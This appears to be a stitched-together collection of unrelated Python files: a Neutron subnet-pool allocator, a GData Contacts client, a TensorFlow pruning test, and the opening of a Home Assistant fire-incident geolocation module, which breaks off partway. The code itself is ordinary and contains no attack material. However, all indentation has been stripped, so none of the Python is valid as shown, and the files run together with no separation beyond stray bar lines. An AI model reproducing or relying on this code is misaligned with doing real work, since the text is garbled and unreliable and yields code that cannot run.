# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import math
import operator
import netaddr
from neutron_lib import constants
from neutron_lib import exceptions as lib_exc
from oslo_db import exception as db_exc
from oslo_utils import uuidutils
from neutron._i18n import _
from neutron.common import exceptions as n_exc
from neutron.db import api as db_api
from neutron.db import models_v2
from neutron.ipam import driver
from neutron.ipam import exceptions as ipam_exc
from neutron.ipam import requests as ipam_req
from neutron.ipam import utils as ipam_utils
class SubnetAllocator(driver.Pool):
"""Class for handling allocation of subnet prefixes from a subnet pool.
This class leverages the pluggable IPAM interface where possible to
make merging into IPAM framework easier in future cycles.
"""
def __init__(self, subnetpool, context):
super(SubnetAllocator, self).__init__(subnetpool, context)
self._sp_helper = SubnetPoolHelper()
def _lock_subnetpool(self):
"""Lock subnetpool associated row.
This method disallows to allocate concurrently 2 subnets in the same
subnetpool, it's required to ensure non-overlapping cidrs in the same
subnetpool.
"""
with db_api.context_manager.reader.using(self._context):
current_hash = (
self._context.session.query(models_v2.SubnetPool.hash)
.filter_by(id=self._subnetpool['id']).scalar())
if current_hash is None:
# NOTE(cbrandily): subnetpool has been deleted
raise n_exc.SubnetPoolNotFound(
subnetpool_id=self._subnetpool['id'])
new_hash = uuidutils.generate_uuid()
# NOTE(cbrandily): the update disallows 2 concurrent subnet allocation
# to succeed: at most 1 transaction will succeed, others will be
# rolled back and be caught in neutron.db.v2.base
with db_api.context_manager.writer.using(self._context):
query = (
self._context.session.query(models_v2.SubnetPool).filter_by(
id=self._subnetpool['id'], hash=current_hash))
count = query.update({'hash': new_hash})
if not count:
raise db_exc.RetryRequest(lib_exc.SubnetPoolInUse(
subnet_pool_id=self._subnetpool['id']))
def _get_allocated_cidrs(self):
with db_api.context_manager.reader.using(self._context):
query = self._context.session.query(models_v2.Subnet)
subnets = query.filter_by(subnetpool_id=self._subnetpool['id'])
return (x.cidr for x in subnets)
def _get_available_prefix_list(self):
prefixes = (x.cidr for x in self._subnetpool.prefixes)
allocations = self._get_allocated_cidrs()
prefix_set = netaddr.IPSet(iterable=prefixes)
allocation_set = netaddr.IPSet(iterable=allocations)
available_set = prefix_set.difference(allocation_set)
available_set.compact()
return sorted(available_set.iter_cidrs(),
key=operator.attrgetter('prefixlen'),
reverse=True)
def _num_quota_units_in_prefixlen(self, prefixlen, quota_unit):
return math.pow(2, quota_unit - prefixlen)
def _allocations_used_by_tenant(self, quota_unit):
subnetpool_id = self._subnetpool['id']
tenant_id = self._subnetpool['tenant_id']
with db_api.context_manager.reader.using(self._context):
qry = self._context.session.query(models_v2.Subnet)
allocations = qry.filter_by(subnetpool_id=subnetpool_id,
tenant_id=tenant_id)
value = 0
for allocation in allocations:
prefixlen = netaddr.IPNetwork(allocation.cidr).prefixlen
value += self._num_quota_units_in_prefixlen(prefixlen,
quota_unit)
return value
def _check_subnetpool_tenant_quota(self, tenant_id, prefixlen):
quota_unit = self._sp_helper.ip_version_subnetpool_quota_unit(
self._subnetpool['ip_version'])
quota = self._subnetpool.get('default_quota')
if quota:
used = self._allocations_used_by_tenant(quota_unit)
requested_units = self._num_quota_units_in_prefixlen(prefixlen,
quota_unit)
if used + requested_units > quota:
raise n_exc.SubnetPoolQuotaExceeded()
def _allocate_any_subnet(self, request):
with db_api.context_manager.writer.using(self._context):
self._lock_subnetpool()
self._check_subnetpool_tenant_quota(request.tenant_id,
request.prefixlen)
prefix_pool = self._get_available_prefix_list()
for prefix in prefix_pool:
if request.prefixlen >= prefix.prefixlen:
subnet = next(prefix.subnet(request.prefixlen))
gateway_ip = request.gateway_ip
if not gateway_ip:
gateway_ip = subnet.network + 1
pools = ipam_utils.generate_pools(subnet.cidr,
gateway_ip)
return IpamSubnet(request.tenant_id,
request.subnet_id,
subnet.cidr,
gateway_ip=gateway_ip,
allocation_pools=pools)
msg = _("Insufficient prefix space to allocate subnet size /%s")
raise n_exc.SubnetAllocationError(reason=msg %
str(request.prefixlen))
def _allocate_specific_subnet(self, request):
with db_api.context_manager.writer.using(self._context):
self._lock_subnetpool()
self._check_subnetpool_tenant_quota(request.tenant_id,
request.prefixlen)
cidr = request.subnet_cidr
available = self._get_available_prefix_list()
matched = netaddr.all_matching_cidrs(cidr, available)
if len(matched) is 1 and matched[0].prefixlen <= cidr.prefixlen:
return IpamSubnet(request.tenant_id,
request.subnet_id,
cidr,
gateway_ip=request.gateway_ip,
allocation_pools=request.allocation_pools)
msg = _("Cannot allocate requested subnet from the available "
"set of prefixes")
raise n_exc.SubnetAllocationError(reason=msg)
def allocate_subnet(self, request):
max_prefixlen = int(self._subnetpool['max_prefixlen'])
min_prefixlen = int(self._subnetpool['min_prefixlen'])
if request.prefixlen > max_prefixlen:
raise n_exc.MaxPrefixSubnetAllocationError(
prefixlen=request.prefixlen,
max_prefixlen=max_prefixlen)
if request.prefixlen < min_prefixlen:
raise n_exc.MinPrefixSubnetAllocationError(
prefixlen=request.prefixlen,
min_prefixlen=min_prefixlen)
if isinstance(request, ipam_req.AnySubnetRequest):
return self._allocate_any_subnet(request)
elif isinstance(request, ipam_req.SpecificSubnetRequest):
return self._allocate_specific_subnet(request)
else:
msg = _("Unsupported request type")
raise n_exc.SubnetAllocationError(reason=msg)
def get_subnet(self, subnet_id):
raise NotImplementedError()
def update_subnet(self, request):
raise NotImplementedError()
def remove_subnet(self, subnet_id):
raise NotImplementedError()
def get_allocator(self, subnet_ids):
return IpamSubnetGroup(self, subnet_ids)
class IpamSubnet(driver.Subnet):
def __init__(self,
tenant_id,
subnet_id,
cidr,
gateway_ip=None,
allocation_pools=None):
self._req = ipam_req.SpecificSubnetRequest(
tenant_id,
subnet_id,
cidr,
gateway_ip=gateway_ip,
allocation_pools=allocation_pools)
def allocate(self, address_request):
raise NotImplementedError()
def deallocate(self, address):
raise NotImplementedError()
def get_details(self):
return self._req
class IpamSubnetGroup(driver.SubnetGroup):
def __init__(self, driver, subnet_ids):
self._driver = driver
self._subnet_ids = subnet_ids
def allocate(self, address_request):
'''Originally, the Neutron pluggable IPAM backend would ask the driver
to try to allocate an IP from each subnet in turn, one by one. This
implementation preserves that behavior so that existing drivers work
as they did before while giving them the opportunity to optimize it
by overridding the implementation.
'''
for subnet_id in self._subnet_ids:
try:
ipam_subnet = self._driver.get_subnet(subnet_id)
return ipam_subnet.allocate(address_request), subnet_id
except ipam_exc.IpAddressGenerationFailure:
continue
raise ipam_exc.IpAddressGenerationFailureAllSubnets()
class SubnetPoolReader(object):
'''Class to assist with reading a subnetpool, loading defaults, and
inferring IP version from prefix list. Provides a common way of
reading a stored model or a create request with default table
attributes.
'''
MIN_PREFIX_TYPE = 'min'
MAX_PREFIX_TYPE = 'max'
DEFAULT_PREFIX_TYPE = 'default'
_sp_helper = None
def __init__(self, subnetpool):
self._read_prefix_info(subnetpool)
self._sp_helper = SubnetPoolHelper()
self._read_id(subnetpool)
self._read_prefix_bounds(subnetpool)
self._read_attrs(subnetpool,
['tenant_id', 'name', 'is_default', 'shared'])
self.description = subnetpool.get('description')
self._read_address_scope(subnetpool)
self.subnetpool = {'id': self.id,
'name': self.name,
'project_id': self.tenant_id,
'prefixes': self.prefixes,
'min_prefix': self.min_prefix,
'min_prefixlen': self.min_prefixlen,
'max_prefix': self.max_prefix,
'max_prefixlen': self.max_prefixlen,
'default_prefix': self.default_prefix,
'default_prefixlen': self.default_prefixlen,
'default_quota': self.default_quota,
'address_scope_id': self.address_scope_id,
'is_default': self.is_default,
'shared': self.shared,
'description': self.description}
def _read_attrs(self, subnetpool, keys):
for key in keys:
setattr(self, key, subnetpool[key])
def _ip_version_from_cidr(self, cidr):
return netaddr.IPNetwork(cidr).version
def _prefixlen_from_cidr(self, cidr):
return netaddr.IPNetwork(cidr).prefixlen
def _read_id(self, subnetpool):
id = subnetpool.get('id', constants.ATTR_NOT_SPECIFIED)
if id is constants.ATTR_NOT_SPECIFIED:
id = uuidutils.generate_uuid()
self.id = id
def _read_prefix_bounds(self, subnetpool):
ip_version = self.ip_version
default_min = self._sp_helper.default_min_prefixlen(ip_version)
default_max = self._sp_helper.default_max_prefixlen(ip_version)
self._read_prefix_bound(self.MIN_PREFIX_TYPE,
subnetpool,
default_min)
self._read_prefix_bound(self.MAX_PREFIX_TYPE,
subnetpool,
default_max)
self._read_prefix_bound(self.DEFAULT_PREFIX_TYPE,
subnetpool,
self.min_prefixlen)
self._sp_helper.validate_min_prefixlen(self.min_prefixlen,
self.max_prefixlen)
self._sp_helper.validate_max_prefixlen(self.max_prefixlen,
ip_version)
self._sp_helper.validate_default_prefixlen(self.min_prefixlen,
self.max_prefixlen,
self.default_prefixlen)
def _read_prefix_bound(self, type, subnetpool, default_bound=None):
prefixlen_attr = type + '_prefixlen'
prefix_attr = type + '_prefix'
prefixlen = subnetpool.get(prefixlen_attr,
constants.ATTR_NOT_SPECIFIED)
wildcard = self._sp_helper.wildcard(self.ip_version)
if prefixlen is constants.ATTR_NOT_SPECIFIED and default_bound:
prefixlen = default_bound
if prefixlen is not constants.ATTR_NOT_SPECIFIED:
prefix_cidr = '/'.join((wildcard,
str(prefixlen)))
setattr(self, prefix_attr, prefix_cidr)
setattr(self, prefixlen_attr, prefixlen)
def _read_prefix_info(self, subnetpool):
prefix_list = subnetpool['prefixes']
if not prefix_list:
raise n_exc.EmptySubnetPoolPrefixList()
ip_version = None
for prefix in prefix_list:
if not ip_version:
ip_version = netaddr.IPNetwork(prefix).version
elif netaddr.IPNetwork(prefix).version != ip_version:
raise n_exc.PrefixVersionMismatch()
self.default_quota = subnetpool.get('default_quota')
if self.default_quota is constants.ATTR_NOT_SPECIFIED:
self.default_quota = None
self.ip_version = ip_version
self.prefixes = self._compact_subnetpool_prefix_list(prefix_list)
def _read_address_scope(self, subnetpool):
address_scope_id = subnetpool.get('address_scope_id',
constants.ATTR_NOT_SPECIFIED)
if address_scope_id is constants.ATTR_NOT_SPECIFIED:
address_scope_id = None
self.address_scope_id = address_scope_id
def _compact_subnetpool_prefix_list(self, prefix_list):
"""Compact any overlapping prefixes in prefix_list and return the
result
"""
ip_set = netaddr.IPSet()
for prefix in prefix_list:
ip_set.add(netaddr.IPNetwork(prefix))
ip_set.compact()
return [x.cidr for x in ip_set.iter_cidrs()]
class SubnetPoolHelper(object):
_PREFIX_VERSION_INFO = {4: {'max_prefixlen': constants.IPv4_BITS,
'wildcard': '0.0.0.0',
'default_min_prefixlen': 8,
# IPv4 quota measured in units of /32
'quota_units': 32},
6: {'max_prefixlen': constants.IPv6_BITS,
'wildcard': '::',
'default_min_prefixlen': 64,
# IPv6 quota measured in units of /64
'quota_units': 64}}
def validate_min_prefixlen(self, min_prefixlen, max_prefixlen):
if min_prefixlen < 0:
raise n_exc.UnsupportedMinSubnetPoolPrefix(prefix=min_prefixlen,
version=4)
if min_prefixlen > max_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='min_prefixlen',
prefixlen=min_prefixlen,
base_prefix_type='max_prefixlen',
base_prefixlen=max_prefixlen)
def validate_max_prefixlen(self, prefixlen, ip_version):
max = self._PREFIX_VERSION_INFO[ip_version]['max_prefixlen']
if prefixlen > max:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='max_prefixlen',
prefixlen=prefixlen,
base_prefix_type='ip_version_max',
base_prefixlen=max)
def validate_default_prefixlen(self,
min_prefixlen,
max_prefixlen,
default_prefixlen):
if default_prefixlen < min_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='default_prefixlen',
prefixlen=default_prefixlen,
base_prefix_type='min_prefixlen',
base_prefixlen=min_prefixlen)
if default_prefixlen > max_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='default_prefixlen',
prefixlen=default_prefixlen,
base_prefix_type='max_prefixlen',
base_prefixlen=max_prefixlen)
def wildcard(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['wildcard']
def default_max_prefixlen(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['max_prefixlen']
def default_min_prefixlen(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['default_min_prefixlen']
def ip_version_subnetpool_quota_unit(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['quota_units']
|
|
#!/usr/bin/python
#
# Copyright (C) 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ContactsService extends the GDataService to streamline Google Contacts operations.
ContactsService: Provides methods to query feeds and manipulate items. Extends
GDataService.
DictionaryToParamList: Function which converts a dictionary into a list of
URL arguments (represented as strings). This is a
utility function used in CRUD operations.
"""
__author__ = 'dbrattli (Dag Brattli)'
import gdata
import atom.service
import gdata.service
import gdata.calendar
import atom
DEFAULT_BATCH_URL = ('http://www.google.com/m8/feeds/contacts/default/full'
'/batch')
class Error(Exception):
pass
class RequestError(Error):
pass
class ContactsService(gdata.service.GDataService):
"""Client for the Google Contacts service."""
def __init__(self, email=None, password=None, source=None,
server='www.google.com', additional_headers=None,
contact_list='default', **kwargs):
"""Creates a client for the Contacts service.
Args:
email: string (optional) The user's email address, used for
authentication.
password: string (optional) The user's password.
source: string (optional) The name of the user's application.
server: string (optional) The name of the server to which a connection
will be opened. Default value: 'www.google.com'.
contact_list: string (optional) The name of the default contact list to
use when no URI is specified to the methods of the service.
Default value: 'default' (the logged in user's contact list).
**kwargs: The other parameters to pass to gdata.service.GDataService
constructor.
"""
self.contact_list = contact_list
gdata.service.GDataService.__init__(
self, email=email, password=password, service='cp', source=source,
server=server, additional_headers=additional_headers, **kwargs)
def GetFeedUri(self, kind='contacts', contact_list=None, projection='full',
scheme=None):
"""Builds a feed URI.
Args:
kind: The type of feed to return, typically 'groups' or 'contacts'.
Default value: 'contacts'.
contact_list: The contact list to return a feed for.
Default value: self.contact_list.
projection: The projection to apply to the feed contents, for example
'full', 'base', 'base/12345', 'full/batch'. Default value: 'full'.
scheme: The URL scheme such as 'http' or 'https', None to return a
relative URI without hostname.
Returns:
A feed URI using the given kind, contact list, and projection.
Example: '/m8/feeds/contacts/default/full'.
"""
contact_list = contact_list or self.contact_list
prefix = scheme and '%s://%s' % (scheme, self.server) or ''
return '%s/m8/feeds/%s/%s/%s' % (prefix, kind, contact_list, projection)
def GetContactsFeed(self, uri=None):
uri = uri or self.GetFeedUri()
return self.Get(uri, converter=gdata.contacts.ContactsFeedFromString)
def GetContact(self, uri):
return self.Get(uri, converter=gdata.contacts.ContactEntryFromString)
def CreateContact(self, new_contact, insert_uri=None, url_params=None,
escape_params=True):
"""Adds an new contact to Google Contacts.
Args:
new_contact: atom.Entry or subclass A new contact which is to be added to
Google Contacts.
insert_uri: the URL to post new contacts to the feed
url_params: dict (optional) Additional URL parameters to be included
in the insertion request.
escape_params: boolean (optional) If true, the url_parameters will be
escaped before they are included in the request.
Returns:
On successful insert, an entry containing the contact created
On failure, a RequestError is raised of the form:
{'status': HTTP status code from server,
'reason': HTTP reason from the server,
'body': HTTP body of the server's response}
"""
insert_uri = insert_uri or self.GetFeedUri()
return self.Post(new_contact, insert_uri, url_params=url_params,
escape_params=escape_params,
converter=gdata.contacts.ContactEntryFromString)
def UpdateContact(self, edit_uri, updated_contact, url_params=None,
escape_params=True):
"""Updates an existing contact.
Args:
edit_uri: string The edit link URI for the element being updated
updated_contact: string, atom.Entry or subclass containing
the Atom Entry which will replace the contact which is
stored at the edit_url
url_params: dict (optional) Additional URL parameters to be included
in the update request.
escape_params: boolean (optional) If true, the url_parameters will be
escaped before they are included in the request.
Returns:
On successful update, a httplib.HTTPResponse containing the server's
response to the PUT request.
On failure, a RequestError is raised of the form:
{'status': HTTP status code from server,
'reason': HTTP reason from the server,
'body': HTTP body of the server's response}
"""
return self.Put(updated_contact, self._CleanUri(edit_uri),
url_params=url_params,
escape_params=escape_params,
converter=gdata.contacts.ContactEntryFromString)
def DeleteContact(self, edit_uri, extra_headers=None,
url_params=None, escape_params=True):
"""Removes an contact with the specified ID from Google Contacts.
Args:
edit_uri: string The edit URL of the entry to be deleted. Example:
'/m8/feeds/contacts/default/full/xxx/yyy'
url_params: dict (optional) Additional URL parameters to be included
in the deletion request.
escape_params: boolean (optional) If true, the url_parameters will be
escaped before they are included in the request.
Returns:
On successful delete, a httplib.HTTPResponse containing the server's
response to the DELETE request.
On failure, a RequestError is raised of the form:
{'status': HTTP status code from server,
'reason': HTTP reason from the server,
'body': HTTP body of the server's response}
"""
return self.Delete(self._CleanUri(edit_uri),
url_params=url_params, escape_params=escape_params)
def GetGroupsFeed(self, uri=None):
uri = uri or self.GetFeedUri('groups')
return self.Get(uri, converter=gdata.contacts.GroupsFeedFromString)
def CreateGroup(self, new_group, insert_uri=None, url_params=None,
escape_params=True):
insert_uri = insert_uri or self.GetFeedUri('groups')
return self.Post(new_group, insert_uri, url_params=url_params,
escape_params=escape_params,
converter=gdata.contacts.GroupEntryFromString)
def UpdateGroup(self, edit_uri, updated_group, url_params=None,
escape_params=True):
return self.Put(updated_group, self._CleanUri(edit_uri),
url_params=url_params,
escape_params=escape_params,
converter=gdata.contacts.GroupEntryFromString)
def DeleteGroup(self, edit_uri, extra_headers=None,
url_params=None, escape_params=True):
return self.Delete(self._CleanUri(edit_uri),
url_params=url_params, escape_params=escape_params)
def ChangePhoto(self, media, contact_entry_or_url, content_type=None,
content_length=None):
"""Change the photo for the contact by uploading a new photo.
Performs a PUT against the photo edit URL to send the binary data for the
photo.
Args:
media: filename, file-like-object, or a gdata.MediaSource object to send.
contact_entry_or_url: ContactEntry or str If it is a ContactEntry, this
method will search for an edit photo link URL and
perform a PUT to the URL.
content_type: str (optional) the mime type for the photo data. This is
necessary if media is a file or file name, but if media
is a MediaSource object then the media object can contain
the mime type. If media_type is set, it will override the
mime type in the media object.
content_length: int or str (optional) Specifying the content length is
only required if media is a file-like object. If media
is a filename, the length is determined using
os.path.getsize. If media is a MediaSource object, it is
assumed that it already contains the content length.
"""
if isinstance(contact_entry_or_url, gdata.contacts.ContactEntry):
url = contact_entry_or_url.GetPhotoEditLink().href
else:
url = contact_entry_or_url
if isinstance(media, gdata.MediaSource):
payload = media
# If the media object is a file-like object, then use it as the file
# handle in the in the MediaSource.
elif hasattr(media, 'read'):
payload = gdata.MediaSource(file_handle=media,
content_type=content_type, content_length=content_length)
# Assume that the media object is a file name.
else:
payload = gdata.MediaSource(content_type=content_type,
content_length=content_length, file_path=media)
return self.Put(payload, url)
def GetPhoto(self, contact_entry_or_url):
"""Retrives the binary data for the contact's profile photo as a string.
Args:
contact_entry_or_url: a gdata.contacts.ContactEntry objecr or a string
containing the photo link's URL. If the contact entry does not
contain a photo link, the image will not be fetched and this method
will return None.
"""
# TODO: add the ability to write out the binary image data to a file,
# reading and writing a chunk at a time to avoid potentially using up
# large amounts of memory.
url = None
if isinstance(contact_entry_or_url, gdata.contacts.ContactEntry):
photo_link = contact_entry_or_url.GetPhotoLink()
if photo_link:
url = photo_link.href
else:
url = contact_entry_or_url
if url:
return self.Get(url, converter=str)
else:
return None
def DeletePhoto(self, contact_entry_or_url):
url = None
if isinstance(contact_entry_or_url, gdata.contacts.ContactEntry):
url = contact_entry_or_url.GetPhotoEditLink().href
else:
url = contact_entry_or_url
if url:
self.Delete(url)
def ExecuteBatch(self, batch_feed, url,
converter=gdata.contacts.ContactsFeedFromString):
"""Sends a batch request feed to the server.
Args:
batch_feed: gdata.contacts.ContactFeed A feed containing batch
request entries. Each entry contains the operation to be performed
on the data contained in the entry. For example an entry with an
operation type of insert will be used as if the individual entry
had been inserted.
url: str The batch URL to which these operations should be applied.
converter: Function (optional) The function used to convert the server's
response to an object. The default value is ContactsFeedFromString.
Returns:
The results of the batch request's execution on the server. If the
default converter is used, this is stored in a ContactsFeed.
"""
return self.Post(batch_feed, url, converter=converter)
def _CleanUri(self, uri):
"""Sanitizes a feed URI.
Args:
uri: The URI to sanitize, can be relative or absolute.
Returns:
The given URI without its http://server prefix, if any.
Keeps the leading slash of the URI.
"""
url_prefix = 'http://%s' % self.server
if uri.startswith(url_prefix):
uri = uri[len(url_prefix):]
return uri
class ContactsQuery(gdata.service.Query):
def __init__(self, feed=None, text_query=None, params=None,
categories=None, group=None):
self.feed = feed or '/m8/feeds/contacts/default/full'
if group:
self._SetGroup(group)
gdata.service.Query.__init__(self, feed=self.feed, text_query=text_query,
params=params, categories=categories)
def _GetGroup(self):
if 'group' in self:
return self['group']
else:
return None
def _SetGroup(self, group_id):
self['group'] = group_id
group = property(_GetGroup, _SetGroup,
doc='The group query parameter to find only contacts in this group')
class GroupsQuery(gdata.service.Query):
def __init__(self, feed=None, text_query=None, params=None,
categories=None):
self.feed = feed or '/m8/feeds/groups/default/full'
gdata.service.Query.__init__(self, feed=self.feed, text_query=text_query,
params=params, categories=categories)
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for strip_pruning_vars."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from tensorflow.contrib.model_pruning.python import pruning
from tensorflow.contrib.model_pruning.python import strip_pruning_vars_lib
from tensorflow.contrib.model_pruning.python.layers import layers
from tensorflow.contrib.model_pruning.python.layers import rnn_cells
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell as tf_rnn_cells
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import training_util
def _get_number_pruning_vars(graph_def):
number_vars = 0
for node in graph_def.node:
if re.match(r"^.*(mask$)|(threshold$)", node.name):
number_vars += 1
return number_vars
def _get_node_names(tensor_names):
return [
strip_pruning_vars_lib._node_name(tensor_name)
for tensor_name in tensor_names
]
class StripPruningVarsTest(test.TestCase):
def setUp(self):
param_list = [
"pruning_frequency=1", "begin_pruning_step=1", "end_pruning_step=10",
"nbins=2048", "threshold_decay=0.0"
]
self.initial_graph = ops.Graph()
self.initial_graph_def = None
self.final_graph = ops.Graph()
self.final_graph_def = None
self.pruning_spec = ",".join(param_list)
with self.initial_graph.as_default():
self.sparsity = variables.Variable(0.5, name="sparsity")
self.global_step = training_util.get_or_create_global_step()
self.increment_global_step = state_ops.assign_add(self.global_step, 1)
self.mask_update_op = None
def _build_convolutional_model(self, number_of_layers):
# Create a graph with several conv2d layers
kernel_size = 3
base_depth = 4
depth_step = 7
height, width = 7, 9
with variable_scope.variable_scope("conv_model"):
input_tensor = array_ops.ones((8, height, width, base_depth))
top_layer = input_tensor
for ix in range(number_of_layers):
top_layer = layers.masked_conv2d(
top_layer,
base_depth + (ix + 1) * depth_step,
kernel_size,
scope="Conv_" + str(ix))
return top_layer
def _build_fully_connected_model(self, number_of_layers):
base_depth = 4
depth_step = 7
input_tensor = array_ops.ones((8, base_depth))
top_layer = input_tensor
with variable_scope.variable_scope("fc_model"):
for ix in range(number_of_layers):
top_layer = layers.masked_fully_connected(
top_layer, base_depth + (ix + 1) * depth_step)
return top_layer
def _build_lstm_model(self, number_of_layers):
batch_size = 8
dim = 10
inputs = variables.Variable(random_ops.random_normal([batch_size, dim]))
def lstm_cell():
return rnn_cells.MaskedBasicLSTMCell(
dim, forget_bias=0.0, state_is_tuple=True, reuse=False)
cell = tf_rnn_cells.MultiRNNCell(
[lstm_cell() for _ in range(number_of_layers)], state_is_tuple=True)
outputs = rnn.static_rnn(
cell, [inputs],
initial_state=cell.zero_state(batch_size, dtypes.float32))
return outputs
def _prune_model(self, session):
pruning_hparams = pruning.get_pruning_hparams().parse(self.pruning_spec)
p = pruning.Pruning(pruning_hparams, sparsity=self.sparsity)
self.mask_update_op = p.conditional_mask_update_op()
variables.global_variables_initializer().run()
for _ in range(20):
session.run(self.mask_update_op)
session.run(self.increment_global_step)
def _get_outputs(self, session, input_graph, tensors_list, graph_prefix=None):
outputs = []
for output_tensor in tensors_list:
if graph_prefix:
output_tensor = graph_prefix + "/" + output_tensor
outputs.append(
session.run(session.graph.get_tensor_by_name(output_tensor)))
return outputs
def _get_initial_outputs(self, output_tensor_names_list):
with self.session(graph=self.initial_graph) as sess1:
self._prune_model(sess1)
reference_outputs = self._get_outputs(sess1, self.initial_graph,
output_tensor_names_list)
self.initial_graph_def = graph_util.convert_variables_to_constants(
sess1, sess1.graph.as_graph_def(),
_get_node_names(output_tensor_names_list))
return reference_outputs
def _get_final_outputs(self, output_tensor_names_list):
self.final_graph_def = strip_pruning_vars_lib.strip_pruning_vars_fn(
self.initial_graph_def, _get_node_names(output_tensor_names_list))
_ = importer.import_graph_def(self.final_graph_def, name="final")
with self.test_session(self.final_graph) as sess2:
final_outputs = self._get_outputs(
sess2,
self.final_graph,
output_tensor_names_list,
graph_prefix="final")
return final_outputs
def _check_removal_of_pruning_vars(self, number_masked_layers):
self.assertEqual(
_get_number_pruning_vars(self.initial_graph_def), number_masked_layers)
self.assertEqual(_get_number_pruning_vars(self.final_graph_def), 0)
def _check_output_equivalence(self, initial_outputs, final_outputs):
for initial_output, final_output in zip(initial_outputs, final_outputs):
self.assertAllEqual(initial_output, final_output)
def testConvolutionalModel(self):
with self.initial_graph.as_default():
number_masked_conv_layers = 5
top_layer = self._build_convolutional_model(number_masked_conv_layers)
output_tensor_names = [top_layer.name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_conv_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
def testFullyConnectedModel(self):
with self.initial_graph.as_default():
number_masked_fc_layers = 3
top_layer = self._build_fully_connected_model(number_masked_fc_layers)
output_tensor_names = [top_layer.name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_fc_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
def testLSTMModel(self):
with self.initial_graph.as_default():
number_masked_lstm_layers = 2
outputs = self._build_lstm_model(number_masked_lstm_layers)
output_tensor_names = [outputs[0][0].name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_lstm_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
if __name__ == "__main__":
test.main()
|
|
"""Support for NSW Rural Fire Service Feeds."""
from __future__ import annotations
from datetime import timedelta
import logging
from aio_geojson_nsw_rfs_incidents import NswRuralFireServiceIncidentsFeedManager
import voluptuous as vol
from homeassistant.components.geo_location import PLATFORM_SCHEMA, GeolocationEvent
from homeassistant.const import (
ATTR_ATTRIBUTION,
ATTR_LOCATION,
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_RADIUS,
CONF_SCAN_INTERVAL,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
LENGTH_KILOMETERS,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers import aiohttp_client, config_validation as cv
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.event import async_track_time_interval
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
_LOGGER = logging.getLogger(__name__)
ATTR_CATEGORY = "category"
ATTR_COUNCIL_AREA = "council_area"
ATTR_EXTERNAL_ID = "external_id"
ATTR_FIRE = "fire"
ATTR_PUBLICATION_DATE = "publication_date"
ATTR_RESPONSIBLE_AGENCY = "responsible_agency"
ATTR_SIZE = "size"
ATTR_STATUS = "status"
ATTR_TYPE = "type"
CONF_CATEGORIES = "categories"
DEFAULT_RADIUS_IN_KM = 20.0
SCAN_INTERVAL = timedelta(minutes=5)
SIGNAL_DELETE_ENTITY = "nsw_rural_fire_service_feed_delete_{}"
SIGNAL_UPDATE_ENTITY = "nsw_rural_fire_service_feed_update_{}"
SOURCE = "nsw_rural_fire_service_feed"
VALID_CATEGORIES = ["Advice", "Emergency Warning", "Not Applicable", "Watch and Act"]
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_CATEGORIES, default=[]): vol.All(
cv.ensure_list, [vol.In(VALID_CATEGORIES)]
),
vol.Optional(CONF_LATITUDE): cv.latitude,
vol.Optional(CONF_LONGITUDE): cv.longitude,
vol.Optional(CONF_RADIUS, default=DEFAULT_RADIUS_IN_KM): vol.Coerce(float),
}
